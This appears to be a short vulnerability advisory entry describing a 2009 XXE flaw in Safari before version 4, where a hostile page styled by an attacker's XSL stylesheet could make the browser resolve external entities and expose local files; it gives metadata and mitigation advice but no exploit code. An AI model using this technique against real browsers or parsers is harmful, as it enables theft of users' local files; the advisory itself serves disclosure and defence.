Vendor: Safari
By: Chris
CVSS: 7.5 (HIGH)
CWE: 611 (XXE attack)
Product Name: Safari
Affected Version From: Safari prior to version 4
Affected Version To: Safari version 4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Safari prior to version 4 may permit an evil web page to steal files from the local system
Safari prior to version 4 may permit an evil web page to steal files from the local system. This is accomplished by mounting an XXE attack against the parsing of the XSL stylesheet. To mount the attack, the attacker serves a web page with an XML MIME type that requests to be styled by the attacker's stylesheet; external entities declared in that stylesheet are resolved by the browser, exposing local file contents.
Mitigation:
Update to Safari version 4 or later, where this issue is fixed. Ensure that XML parsing in the application is not vulnerable to XXE attacks by disabling external entity references and DTD processing.